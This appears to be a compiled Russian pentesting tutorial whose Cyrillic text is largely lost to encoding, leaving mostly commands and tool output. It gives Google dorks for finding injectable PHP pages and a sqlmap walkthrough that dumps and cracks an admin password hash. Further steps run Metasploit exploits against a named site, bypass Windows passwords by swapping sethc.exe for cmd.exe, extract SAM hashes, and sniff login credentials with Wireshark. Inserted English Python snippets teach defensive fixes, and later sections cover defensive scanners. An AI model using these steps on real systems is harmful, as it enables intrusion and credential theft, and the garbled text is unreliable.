inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=
inurl:avd_start.php?avd= inurl:download.php?id=
inurl:event.php?id= inurl:main.php?id=
inurl:product-item.php?id= inurl:review.php?id=
inurl:sql.php?id= inurl:chappies.php?id=
inurl:material.php?id= inurl:read.php?id=
inurl:clanek.php4?id= inurl:prod_detail.php?id=
inurl:announce.php?id= inurl:viewphoto.php?id=
inurl:chappies.php?id= inurl:article.php?id=
inurl:read.php?id= inurl:person.php?id=
inurl:viewapp.php?id= inurl:productinfo.php?id=
inurl:viewphoto.php?id= inurl:showimg.php?id=
inurl:rub.php?idr= inurl:view.php?id=

inurl:galeri_info.php?l= inurl:website.php?id=
1.: , - SQLMAP
SQL-
, , .
, SQLMAP SQL-.
, , ,
.
, inurl:rubrika.php?idr=, -
:
http://www.sqldummywebsite.name/rubrika.php?id=28
' URL. ( "
, ' ).
:
http://www.sqldummywebsite.name/rubrika.php?id=28'
SQL , SQLMAP SQL-.
,
.
.

SQLi
Microsoft SQL Server
Server Error in / Application. Unclosed quotation mark before the character string attack;
Description: An unhanded exception occurred during the execution of the current web request. Plea
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the chara
MySQL
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/ww
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL se
Oracle
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.D
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near
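The error messages listed above appear because the application splices the `id` value straight into the SQL text, so the appended quote becomes part of the query. The following added example (not from the original text or from sqlmap) shows the vulnerable concatenation next to the parameterized form that the fix requires, using an in-memory SQLite table constructed here; the table name `rubrika` and its rows are assumptions chosen to mirror the URL in the text.

```python
"""Vulnerable string-built query vs. bound parameter.  Added example with
a constructed in-memory SQLite table; not the page's or sqlmap's code."""
import sqlite3


def make_db():
    """Constructed sample table standing in for the site's rubrika.php data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rubrika (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO rubrika VALUES (?, ?)",
                     [(28, "Laminate floors"), (31, "Parquet")])
    return conn


def vulnerable_lookup(conn, user_id):
    """String concatenation: the request parameter becomes SQL syntax,
    so a stray quote breaks the statement and the DB error leaks to the page."""
    sql = "SELECT title FROM rubrika WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, user_id):
    """Bound parameter: the driver passes the value separately from the
    statement, so a quote is only a character inside a string."""
    return [row[0] for row in conn.execute(
        "SELECT title FROM rubrika WHERE id = ?", (user_id,))]


def probe(conn, user_id):
    """Mirror the manual test from the text: does the quoted input raise
    a database error (the tell-tale) or return a clean, empty result?"""
    results = {}
    for name, fn in (("vulnerable", vulnerable_lookup), ("safe", safe_lookup)):
        try:
            results[name] = ("ok", fn(conn, user_id))
        except sqlite3.Error as exc:
            results[name] = ("error", str(exc))
    return results


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "28"))   # both variants return the row
    print(probe(db, "28'"))  # vulnerable variant errors, safe returns []
```

On a real site the same distinction decides whether `?id=28'` produces one of the error pages listed above or simply "not found"; the bound-parameter form is the fix regardless of which DBMS the error fingerprint points to.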
2: SQLMAP SQL-
, -
SQLMAP SQL-.
( ). SQLMAP,
, .

-.
sqlmap -u http://www.sqldummywebsite.name/rubrika.php?id=31 --dbs
:
sqlmap = sqlmap
-u = (. http://www.sqldummywebsite.name/rubrika.php?id=31)
--dbs =

:
web server operating system: Linux Gentoo
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[18:47:01] [INFO] resumed: information_schema
[18:47:01] [INFO] resumed: laminat
, , ,
information_schema MYSQL.
, laminat.
3. , SQLMAP SQL-

- .
:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat --tables
, 18 .
[18:52:25] [INFO] fetching tables for database: 'laminat'
[18:52:25] [INFO] fetching number of tables for database 'laminat'
[18:52:25] [INFO] resumed: 18
[18:52:25] [INFO] resumed: admin
[18:52:25] [INFO] resumed: browser
[18:52:25] [INFO] resumed: diskuse
[18:52:25] [INFO] resumed: diskuse_obor
[18:52:25] [INFO] resumed: diskuse_tema
[18:52:25] [INFO] resumed: historie
[18:52:25] [INFO] resumed: mag_admvolby
[18:52:25] [INFO] resumed: mag_anketa
[18:52:25] [INFO] resumed: mag_autori
[18:52:25] [INFO] resuming partial value: mag_cla
[18:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threa
[18:52:25] [INFO] retrieved: ori
[18:54:23] [INFO] retrieved: mag_claori...
............

, admin, SQLMAP SQL-


, , , .
4:
SQLMAP SQL-
admin
-, SQLMAP SQL-. SQLMAP SQL-
, :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --columns
[19:57:42] [INFO] fetching columns for table 'admin' in database 'laminat'
[19:57:42] [INFO] resumed: 5
[19:57:42] [INFO] resumed: id
[19:57:42] [INFO] resumed: int(2)
[19:57:42] [INFO] resumed: login
[19:57:42] [INFO] resumed: v
[19:57:42] [INFO] resumed: heslo
[19:57:42] [INFO] resumed: varchar(32)
[19:57:42] [INFO] resumed: jmeno
[19:57:42] [INFO] resumed: varchar(20)
[19:57:42] [INFO] resumed: stupen
[19:57:42] [INFO] resumed: int(1)
Database: laminat
Table: admin
[5 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| heslo  | varchar(32) |
| id     | int(2)      |
| jmeno  | varchar(20) |
| login  | v           |
| stupen | int(1)      |
+--------+-------------+

! , . ,
:
heslo
stupen
login .
.. .
5: SQLMAP SQL-

SQLMAP SQL- ! :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --dump

. , , ,
, , :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login --dump
.
, .
.
6: SQLMAP SQL-

, . , .
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C heslo --dump
!! .
, . - . -,
- .
. . ,
.
, - , sqlmap .

, , do you want to store hashes to a temporary file for eventual further


processing with other tools, . . ,
. .
do you want to crack them via a dictionary-based attack?,
, , . ,
, , .
:
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) (
Enter)
[2] custom dictionary file ( )
[3] file with list of dictionary files ( )
Enter.
, , do you want to use common password suffixes? (slow!).
, . ,
. .
. .
do you want to store hashes to a temporary file for eventual further processing with other tools [y/
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:00:41] [INFO] using hash method 'md5_generic_passwd'
[20:00:41] [INFO] resuming password 'nuvolari' for hash '493ccdcab464cff215467d4c62a7f142'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:00:45] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:00:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:01:05] [INFO] postprocessing table dump
Database: laminat
Table: admin
[2 entries]
+----+---------------+---------------------------------------------+-------+--------+
| id | jmeno         | heslo                                       | login | stupen |
+----+---------------+---------------------------------------------+-------+--------+
| 1  | M?la          | 493ccdcab464cff215467d4c62a7f142 (nuvolari) | fucek | 1      |
| 4  | Administr?tor | d41d8cd98f00b204e9800998ecf8427e            | admin | 1      |
+----+---------------+---------------------------------------------+-------+--------+
, !
.
. .
.
, ,
.
, ,
, , . .
,
.
, ,
MD5, phpBB, MySQL SHA1 Hashcat Kali. .
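Two things in the dump above are worth checking on the defending side: the `heslo` column holds bare 32-character MD5 values with no salt, which is why a wordlist matches `nuvolari` in seconds, and the second hash, `d41d8cd98f00b204e9800998ecf8427e`, is MD5 of the empty string, so that account effectively has no password. The following is an added example, not from the original text or from sqlmap; it audits a password table for those two conditions and shows the salted, iterated scheme (PBKDF2-HMAC-SHA256, an assumption about what a fixed application would use) that a migration should move to.

```python
"""Audit stored password hashes for unsalted MD5 and empty passwords,
and show a salted PBKDF2 replacement.  Added example; the two hashes in
DUMPED_HASHES are copied from the dump above, everything else is constructed."""
import hashlib
import hmac
import os

# Hashes exactly as they appear in the dump above (page data, not computed here).
DUMPED_HASHES = {
    "fucek": "493ccdcab464cff215467d4c62a7f142",
    "admin": "d41d8cd98f00b204e9800998ecf8427e",
}


def looks_like_unsalted_md5(stored: str) -> bool:
    """32 lowercase hex chars with no algorithm/salt prefix: a legacy hash."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored)


def is_md5_of_empty_password(stored: str) -> bool:
    """True when the stored value is MD5("") - the account has no password."""
    return stored == hashlib.md5(b"").hexdigest()


def hash_password(password: str, iterations: int = 200_000) -> str:
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; the stored string is
    self-describing so the parameters can be raised later per user."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt/iterations; compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def audit(table: dict) -> dict:
    """Classify each user's stored hash: 'empty', 'legacy-md5', 'ok' or 'unknown'."""
    out = {}
    for user, stored in table.items():
        if looks_like_unsalted_md5(stored):
            out[user] = "empty" if is_md5_of_empty_password(stored) else "legacy-md5"
        elif stored.startswith("pbkdf2_sha256$"):
            out[user] = "ok"
        else:
            out[user] = "unknown"
    return out


if __name__ == "__main__":
    print(audit(DUMPED_HASHES))
    migrated = {"fucek": hash_password("nuvolari")}
    print(audit(migrated), verify_password("nuvolari", migrated["fucek"]))
```

The `legacy-md5` accounts cannot be rehashed without the plaintext; the usual migration is to rehash at the user's next successful login and to force a reset for any `empty` account.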

-.


. -,
.
, ,
-.
.. , - ,
. , , , , ,
, , ,
, , !

WordPress: WPScanner Plecost

, . WebWare.biz
, ,
. . , WebWare.biz, ,
: ,
. , :
, -
.
(
, ). ,
.
Kali Linux, , ,
Kali Linux ( , ).
WordPress .
. WordPress
, ,
(!). WordPress
.
WordPress Security Scanner
WordPress. :
;
;
;
robots.txt;
WordPress, , .
, . ( ):
wpscan --update
( ), .
WordPress Security Scanner
update : .
url -u < url> : URL / WordPress .
force -f : WPScan , WordPress
( , WordPress, ).
enumerate -e [()] : (
).
:
u : id 1 10
u[10-20] : id 10 20 ( [] )
p :
vp : , ,

ap : ( )
tt : timthumbs
t :
vt : , ,
at : ( ).
, -e p,vt
. ,
"vt,tt,u,vp".
, , .
:
wpscan -h
:
wpscan -u webware.biz -e p,vt
.. wpscan, -u -
. -e ( ).
,
( ).
, WordPress,
, :

WordPress .
:
/proxy/admin.php, Glype;
, . . ,
wp-content/plugins/wordpress-backup-to-dropbox/. ,
, ,

. , VPS ( ,
).
Plecost
WordPress .
, ( , ).
,
, . ,
. . , .

-i, .
, . Kali Linux
//usr/share/plecost/wp_plugin_list.txt ( ).

plecost -i
//usr/share/plecost/wp_plugin_list.txt, . :
plecost -i //usr/share/plecost/wp_plugin_list.txt webware.biz
( ):

, , Metasploit Framework
searchsploit, The Exploit Database .
: WPScan Vulnerability Database ( WordPress)
Packet Storm ( ).
( WordPress)
1. WordPress (
-).
2. , ,
WordPress, (
-) , , . ..
- , , .
3. WordPress:
,
. .
WordPress. ,
, , "" . : )
, ; ) .

4. ( 30
, ). -
( ).
, .
5. ! Kali Linux ! ,
. , Kali Linux,
Linux. , .
,
, ,
. ..
, - , , ,
. , ( )
,
. , ,
, . ..,
, (
), ""
, , .

W3af Kali Linux


W3af (Web Application Attack and Audit Framework) open-source -
.
, - .
, .
-
XSS, CSRF Sqli w3af .
W3af
W3af :
w3af_console
:
w3af>>> help
:
|-----------------------------------------------------------------------------|
| start | . |
| plugins | . |
| exploit | . |
| profiles | . |
| cleanup | . |
|-----------------------------------------------------------------------------|
| help | . : help [] , |
| | "" |
| version | w3af. |
| keys | . |
|-----------------------------------------------------------------------------|
| http-settings | HTTP . |
| misc-settings | w3af. |
| target | URL. |
|-----------------------------------------------------------------------------|
| back | . |
| exit | w3af. |
|-----------------------------------------------------------------------------|
| kb | , . |
|-----------------------------------------------------------------------------|
w3af .
,
"back".
"view"
.
"target". URL .
:
w3af>>> target
w3af/config:target>>> help
:
|-----------------------------------------------------------------------------|
| view | . |
| set | . |
| save | . |
|-----------------------------------------------------------------------------|
| back | . |
| exit | w3af. |
|-----------------------------------------------------------------------------|
URL :
w3af/config:target>>> set target http://localhost
w3af/config:target>>> view
.
w3af/config:target>>> back
w3af>>> plugins
w3af/plugins>>> help
|---------------------------------------------------------------------------------------------------|
| list | List available plugins. |
|---------------------------------------------------------------------------------------------------|
| back | Go to the previous menu. |
| exit | Exit w3af. |
|---------------------------------------------------------------------------------------------------|
| grep | View, configure and enable grep plugins |
| audit | View, configure and enable audit plugins |
| evasion | View, configure and enable evasion plugins |
| crawl | View, configure and enable crawl plugins |
| auth | View, configure and enable auth plugins |
| mangle | View, configure and enable mangle plugins |
| output | View, configure and enable output plugins |
| bruteforce | View, configure and enable bruteforce plugins |
| infrastructure | View, configure and enable infrastructure plugins |
|---------------------------------------------------------------------------------------------------|
-
. Audit,crawl, infrastructure output.
audit, ,
xss, csrf, sql ldap ..
.
:
w3af/plugins>>> audit xss,csrf,sqli

:
w3af/plugins>>> audit all
- .
html.
crawl output.
w3af/plugins>>> crawl web_spider,pykto
w3af/plugins>>> infrastructure hmap
w3af/plugins>>> output console,html_file
:
Web_spider web-.
.
Pykto nikto, python.
nikto (scan_database) .
Hmap -, ,
.
"Server".
hmap Dustin`a Lee.
Console .
Html_file HTML-.
:
w3af/plugins>>> back
w3af>>> start
, .
:
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
Auto-enabling plugin: discovery.error404page
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1
Hmap plugin is starting. Fingerprinting may take a while.
The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2
pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This informa
pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability description: Dire
the /icons directory should be removed. The vulnerability was found in the request with id 128.
pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description: The /d
pykto plugin found a vulnerability at URL: http://localhost/\> . Vulnerability description: The IBM
was found in the request with id 3385.
New URL found by discovery: http://localhost/
New URL found by discovery: http://localhost/test2.html
New URL found by discovery: http://localhost/xst2.html
New URL found by discovery: http://localhost/xst.html
New URL found by discovery: http://localhost/test.html
, results.html:

Metasploit Framework Kali Linux

(Network Services Policy) Kali Linux,


, ,
Metasploit .
Kali PostgreSQL
Metasploit PostgreSQL ,
.
service postgresql start
, PostgreSQL ss -ant ,
5432 .
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    :::22              :::*
LISTEN 0      128    *:22               *:*
LISTEN 0      128    127.0.0.1:5432     *:*
LISTEN 0      128    ::1:5432           :::*
Kali Metasploit
PostgreSQL, , , metasploit.
, , msf3 user
msf3. Metasploit RPC -, .
service metasploit start
msfconsole Kali
, PostgreSQL Metasploit , msfconsole
db_status .
msfconsole
msf > db_status
[*] postgresql connected to msf3
msf >
Metasploit
PostgreSQL Metasploit ,
update-rc.d .
update-rc.d postgresql enable
update-rc.d metasploit enable

Metasploit Exploitation Framework searchsploit


Metasploit Exploitation Framework .


, Metasploit.
Metasploit, .
searchsploit . ,
, , Metasploit.
.
, . ,
, ,
,
.
, , .
Kali Linux . , , :
Metasploit Framework Kali Linux
Kali Linux:

Kali Linux, ,
Linux.
searchsploit
. ,
:
searchsploit -h

5 :
-c .
-v , .
, .
searchsploit ( ), :

searchsploit phpmyadmin

searchsploit wordpress

, . ( ),
, . .
: : .c, .pl, .txt, .sh,
.php, .rb, .py, .zip, .java, .asm, .htm .
.txt
. , , : ,
, , . .

.rb Ruby, :
ruby + + .
:
ruby /usr/share/exploitdb/platforms/php/webapps/28126.rb

.rb Metasploit.
-,
require 'msf/core'
Metasploit

.c .
.php . Ruby
, PHP
( ,
).
,
php /usr/share/exploitdb/platforms/php/webapps/35413.php webware.biz Alexey 50

.pl Perl, , , perl.


( ) PHP.
, .
. Metasploit.
Metasploit
Metasploit .
10 . Metasploit Framework.
- , :

- ,
. :
msf > db_rebuild_cache
search + + . :
msf > search wordpress

, , .
: ,
, ( ),
.
, WordPress , . .
.
, , :
exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent WordPress Download
Manager (download-manager) Unauthenticated File Upload
exploit/unix/webapp/wp_downloadmanager_upload
use .
msf > use exploit/unix/webapp/wp_downloadmanager_upload
, :


show options
( ).

, .
set
:
set RHOST webware.biz

.
TARGETURI. , , phpMyAdmin,
phpmyadmin ,
.

exploit

, .
, , ,
, . . nmap.
:
msf > nmap 10.0.2.2

msf > nmap webware.biz



, , , ,
.
" Kali Linux 1.0.9a. 2.
".

, :
- (phpMyAdmin, WordPress, Drupal . .)
.
. , -.
, .
- , : )
, , ; )
, ,
.

6.

OpenVAS 8.0

.

.
Kali Linux OpenVAS 8.0
Kali Linux.
, ,
OpenVAS 8.0 .
Kali
, , Kali
OpenVAS. , openvas-setup OpenVAS,
, admin .
,
.
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

root@kali:~# apt-get install openvas
root@kali:~# openvas-setup
/var/lib/openvas/private/CA created
/var/lib/openvas/CA created

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed
...
sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
total size is 681654050 speedup is 1.00
[i] Initializing scap database
[i] Updating CPEs
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml
...
Write out database with 1 new entries
Data Base Updated
Restarting Greenbone Security Assistant: gsad.
User created with password '6062d074-0a4c-4de1-a26a-5f9f055b7c88'.
, . - ,
. - ,
, .
.
openvas-setup , OpenVAS manager, GSAD
:
root@kali:~# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address   Foreign Address State  PID/Program name
tcp   0      0      127.0.0.1:9390  0.0.0.0:*       LISTEN 9390/openvasmd
tcp   0      0      127.0.0.1:9391  0.0.0.0:*       LISTEN 9391/openvassd: Wai
tcp   0      0      127.0.0.1:9392  0.0.0.0:*       LISTEN 9392/gsad

- OpenVAS

https://127.0.0.1:9392,
SSL admin.
. (
, ),
. :
openvasmd --get-users
:
openvasmd --user=admin --new-password=1
, admin, , ,
. , , .

openvasmd --create-user=mial
.


openvas-start

! OpenVAS IP ,
. !

Linux (rootkits) rkhunter

(rootkit) ,
, .
, ,
, , -
.
Linux ,
.
Rootkit Hunter (rkhunter). , Linux
rkhunter.
rkhunter Linux
rkhunter Debian, Ubuntu Linux Mint:
$ sudo apt-get install rkhunter
rkhunter Fedora:
$ sudo yum install rkhunter
rkhunter CentOS RHEL Repoforge
, yum.
$ sudo yum install rkhunter
Linux
.
$ sudo rkhunter -c
rkhunter , , :
SHA-1
, .
, .
, , -
.
,
xinetd.
.
.
.
.
.
Rootkit Hunter .

, rkhunter /var/log/rkhunter.log.
.
$ sudo grep Warning /var/log/rkhunter.log

[21:33:23] Checking /dev for suspicious file types [ Warning ]
[21:33:23] Warning: Suspicious file types found in /dev:
[21:33:23] Checking for hidden files and directories [ Warning ]
[21:33:23] Warning: Hidden directory found: '/etc/.java: directory '
[21:33:23] Warning: Hidden directory found: '/dev/.udev: directory '
[21:33:23] Warning: Hidden file found: /dev/.initramfs: symbolic link to `/run/initramfs'
Rootkit Hunter .
, , rkhunter "update".
, wget.
$ sudo rkhunter --update
rkhunter cronjob "cronjob", rkhunter

/var/log/rkhunter.log .
, rkhunter ,
. , rkhunter
- ? -, ,
. , ,

. , ,
rkhunter .
,
, ,
,
.
, , ,
,
. , -
, , .

Linux

Linux 6 ? .
Shellshock, Heartbleed, Poodle, Ghost , , . -
Linux,
. ? openVPN ?
SSH ? Linux.
, , ,
. Lynis. Lynis
.
, .
Lynis.
Linux?
Lynis
.
.
. Lynis
,
. ,
.
Lynis:

1.
2.
3.

Lynis (, yum apt-get),
, Lynis.
.
Lynis
, Lynis
.
. , ,
, .
Lynis,
.
Red Hat: $ sudo yum install lynis
Debian: $ sudo apt-get install lynis
, , . !
?
Lynis
, .
( /usr/local/lynis)
Lynis ( ).
mial@mial-VirtualBox ~ $ sudo -s
[sudo] password for mial:
mial-VirtualBox ~ # mkdir /usr/local/lynis
mial-VirtualBox ~ # cd /usr/local/lynis/
mial-VirtualBox lynis #

Lynis
() Lynis ( lynis-
1.6.4.tar.gz). wget ( ).
Mac OS curl, BSD
fetch.
mial-VirtualBox lynis # wget https://cisofy.com/files/lynis-1.6.4.tar.gz
--2015-02-15 12:55:25-- https://cisofy.com/files/lynis-1.6.4.tar.gz
cisofy.com (cisofy.com) 149.210.134.182
cisofy.com (cisofy.com)|149.210.134.182|:443... .
HTTP- . ... 200 OK
: 171953 (168K) [application/octet-stream]
: lynis-1.6.4.tar.gz

100%[======================================>] 171,953 168KB/s 1.0s

2015-02-15 12:55:29 (168 KB/s) - lynis-1.6.4.tar.gz [171953/171953]

mial-VirtualBox lynis # sha256sum lynis-1.6.4.tar.gz
886c74b591706f896149fe74adb481b58c549d32243d0cf620b46dfdd25dc66d lynis-1.6.4.tar.gz
mial-VirtualBox lynis #
, , .
SHA1, SHA256 .
, sha1, sha1sum, sha256sum
openssl.

mial-VirtualBox lynis # sha1sum lynis-1.6.4.tar.gz
mial-VirtualBox lynis # sha1 lynis-1.6.4.tar.gz
mial-VirtualBox lynis # openssl sha1 lynis-1.6.4.tar.gz
, -.
, , ,
.

lynis
mial-VirtualBox lynis # tar zxvf lynis-1.6.4.tar.gz
mial-VirtualBox lynis # cd lynis/

Lynis
Lynis ,
.
mial-VirtualBox lynis # ./lynis --help

[ Lynis 1.6.4 ]

###############################################################################
Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are
welcome to redistribute it under the terms of the GNU General Public License.
See the LICENSE file for details about using this software.

Copyright 2007-2014 - CISOfy & Michael Boelen, http://cisofy.com
Enterprise support and plugins available via CISOfy - http://cisofy.com
###############################################################################

[+] Initializing program
------------------------------------
Scan options:
--auditor "<name>" : Auditor name
--check-all (-c) : Check system
--no-log : Don't create a log file
--pentest : Non-privileged scan (useful for pentest)
--profile <profile> : Scan the system with the given profile file
--quick (-Q) : Quick mode, don't wait for user input
--tests "<tests>" : Run only tests defined by <tests>
--tests-category "<category>" : Run only tests defined by <category>

Layout options:
--no-colors : Don't use colors in output
--quiet (-q) : No output, except warnings
--reverse-colors : Optimize color display for light backgrounds

Misc options:
--check-update : Check for updates
--debug : Debug logging to screen
--view-manpage (--man) : View man page
--version (-V) : Display version number and quit

Enterprise options:
--plugin-dir "<path>" : Define path of available plugins
--upload : Upload data to central node

See man page and documentation for all available options.
Lynis
Linux Mint Lynis.
./lynis --auditor "MiAl" -c -Q

- PHP:
[+] Software: PHP

Checking PHP [ NOT FOUND ]
Checking PHP disabled functions [ NONE ]
include/tests_php php.ini.
:
mial-VirtualBox lynis # ./lynis -c
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q -q
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -q -Q --pentest
( )
Lynis
Lynis /var/log/lynis.log. Lynis
Shellshock . , ,
.
- . .
Lynis .
/var/log/lynis.log .

, Lynis ( ):
, Lynis .
.
GPLv3 .
.

, .
-
.

, :
HTML ( ).
.
CVE HTML .
.
SQLi .
/.
, config/include .

, ,
. , Lynis .
, Linux, Windows Unix .
,
. Lynis ,
, ( )
.
.
: Lynis
: http://cisofy.com/lynis/
:
: GPLv3
http://cisofy.com/downloads/
, , ,
, .

Linux Malware Detect (LMD) Linux

, , Linux, ,
RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
, Apache
DOS , mod_security mod_evasive.
LMD (Linux Malware Detect).
Malware?
Malware () , ,

. (malware)
, , , ,
,
.
Linux Malware Detect (LMD)?
Linux Malware Detect (LMD) ,
Unix/Linux ,
GNU GPLv2. ,
. , , ,
, , ,
// .

Linux Malware Detect.


http://www.rfxn.com/projects/linux-malware-detect/.
Linux Malware Detect (LMD) RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
1: Linux Malware Detect (LMD)
LMD, wget.
cd /tmp
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
2: LMD
LMD ,
.
tar xfz maldetect-current.tar.gz
cd maldetect-*
./install.sh
, Debian, Ubuntu, Mint ( , sudo)

./install.sh

sudo ./install.sh
, -.
:

3: LMD
,
, , . ,
- , .
email_alert : , 1.
email_subj : .
email_addr :
.

quar_hits : , 1.
quar_clean : , 1.
quar_susp : ,
, .
quar_susp_minuid : userid .
/usr/local/maldetect/conf.maldet .
vi /usr/local/maldetect/conf.maldet

.
# [ EMAIL ALERTS ]
##
# The default email alert toggle
# [0 = disabled, 1 = enabled]
email_alert=1

# The subject line for email alerts
email_subj=" $(hostname)"

# The destination addresses for email alerts
# [ values are comma (,) spaced ]
email_addr="alexey@webware.biz"

# Ignore e-mail alerts for reports in which all hits have been cleaned.
# This is ideal on very busy servers where cleaned hits can drown out
# other more actionable reports.
email_ignore_clean=0

##
# [ QUARANTINE OPTIONS ]
##
# The default quarantine action for malware hits
# [0 = alert only, 1 = move to quarantine & alert]
quar_hits=1

# Try to clean string based malware injections
# [NOTE: quar_hits=1 required]
# [0 = disabled, 1 = clean]
quar_clean=1

# The default suspend action for users wih hits
# Cpanel suspend or set shell /bin/false on non-Cpanel
# [NOTE: quar_hits=1 required]
# [0 = disabled, 1 = suspend account]
quar_susp=0
# minimum userid that can be suspended
quar_susp_minuid=500
4:
,
.
maldet --scan-all /home
, ,
, ,
.
# maldet --quarantine SCANID

# maldet --clean SCANID
5:
LMD /etc/cron.daily/maldet,
, , . .

. ,
.
vi /etc/cron.daily/maldet
, ,
.

Windows?

Windows ( ),
, , .

Windows
.
ElcomSoft System Recovery,
( ,
, ,
- 1, 1111, 123, admin, password, ).
Kali Linux.
, Kali Linux 1) Windows, 2)
,
.
, . 99.99%
, - .
, Live- ( Linux
). C:\Windows\System32\ cmd.exe sethc.exe
osk.exe. , sethc.exe ( osk.exe), cmd.exe
.
sethc.exe, Windows,
, SHIFT, osk.exe,
. (cmd.exe)
:
net user _ *
.. admin, :
net user admin *
.
.

Windows Kali Linux


: Windows ?
Windows SAM (System Account Management) (
). , Active Directory is.
Active Directory is ,
LDAP. SAM
C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\).
SAM , LM NTLM,
.
: .
,
SAM Windows . SAM
( ),
- . SAM
C:\. Linux, Kali,
Live-.
SAM C:\<systemroot>\repair.
SAM .
, , , ,
. expand. Expand
[FILE] [DESTINATION]. SAM
uncompressedSAM.
C:\> expand SAM uncompressedSAM
, Microsoft Windows 2000
SYSKEY. SYSKEY
SAM 128- ,
Windows.
Windows SYSKEY (
) :
1. (, Kali).
2. SAM SYSTEM
(C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\)).
3. SYSTEM bkreg bkhive.
4. .
5. , John the Ripper.
. Windows
MAC(, ), .
,
( ) .
Windows
Windows- SAM SYSKEY.
Windows ,
, Microsoft Windows
.
fdisk -l .
Windows . fdisk NTFS ,
:
Device     Boot  Start  End   Blocks     Id  System
/dev/hdb1  *     1      2432  19535008+  86  NTFS
/dev/hdb2        2433   2554  979965     82  Linux swap/Solaris
/dev/hdb3        2555   6202  29302560   83  Linux
mkdir /mnt/windows.
Windows
:
mount -t <WindowsType> <Windows partition> /mnt/windows
, Windows , SAM
SYSTEM :
cp SAM SYSTEM /pentest/passwords/AttackDirectory
SAM. PwDump and Cain, Abel samdump
.
, SAM.
SAM. ,
SAM .
bkreg bkhive are ,
, :

Windows:
-, .
-. ,
. ( BIOS
,
).
,
VeraCrypt TrueCrypt (
, ).
Windows ,
, , (
) . . .
7. .

- WireShark ( )

, , -
ENTER, . , .
-?? (, ) -
HTTP (PlainText),
( ) . ,
- -, HTTP
. ,
(BGP ,
).
, , ,
HTTP. ,
, , ,

.
, -.
. VirtualBox/VMWare/ .
: ,
.
1. Wireshark
Kali Linux Wireshark
> Kali Linux > Top 10 Security Tools > Wireshark
Wireshark Capture > Interface
, , eth0,
wlan0.
, Start Wireshark .
, Capture > Start

2. POST
, Wireshark .
-, .
, Wireshark. ,
. , ,
,
.
Wireshark . ,
POST.
POST?
,
POST.
POST,
:
http.request.method == "POST"
. 1 POST.

3: POST
Follow TCP Stream

, - :
log=Dimon&pwd=justfortest?
..
log=Dimon ( : Dimon)
pwd=justfortest (: justfortest)
, WebWare.biz .
WireShark
1. . ,
Wi-Fi , .
2. , , ,
. ( ),
